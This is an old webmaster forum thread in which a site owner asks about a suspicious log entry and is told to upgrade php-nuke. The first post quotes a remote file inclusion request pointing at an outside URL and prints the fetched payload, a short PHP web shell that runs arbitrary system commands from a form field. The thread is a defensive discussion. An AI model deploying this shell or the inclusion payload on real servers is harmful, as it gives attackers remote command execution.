Curious Log Entry

Forum Moderators: phranque

Message Too Old, No Replies

Curious Log Entry

Preventing potential hack attempts

BohrMe

4:57 am on Feb 1, 2004 (gmt 0)

I just noticed that periodically I will get an entry in my logs that look like this:

64.246.26.137 - - [31/Jan/2004:14:58:04 -0500] "GET /modules.php?name=http://www.reviewsource.org/.i/2 HTTP/1.0" 200 14873 "-" "Python-urllib/1.15"

After wget'ting the file I find:

<? 
$OS = system('uname -a'); 
echo "<OS>".$OS."</OS>"; 
?> 
<form action="<?=$REQUEST_URI;?>" method=POST> 
<input type=text name=lox value='<?=$lox;?>' ><br> 
<input type=submit> 
</form> 
<pre> 
<xmp> 
<?=system($lox);?> 
</xmp> 
</pre>

I have a feeling this is a hacking attempt because the base URL has nothing to do with my website. This concerns me because they got more than the 77 bytes my site sends me when I use that URL.

Has anyone seen this before? Is it a hacking attempt? And if so, how can I use .htaccess to filter on "name=http" and redirect them to my bad bot script? I believe this to be a good phrase to filter on since this will never get called during normal operations

Thanks.

dcrombie

12:31 pm on Feb 1, 2004 (gmt 0)

If you're using a version of php-nuke older than 6.9 or so then you should upgrade to the latest version (7.x). There are a number of SQL-injection bugs among other exploits documented on the web.

Google: php-nuke exploit [google.com]

BohrMe

2:06 pm on Feb 1, 2004 (gmt 0)

I have 6.9.

dcrombie

5:04 pm on Feb 1, 2004 (gmt 0)

Then you should probably upgrade: php-nuke 6.9 exploit [google.com]

BohrMe

10:08 pm on Feb 1, 2004 (gmt 0)

I already have a security policy in place that takes care of this exploit plus many others. In fact, it was this exploit that caused me to seriously secure my website. Burned once, never again.

Thanks.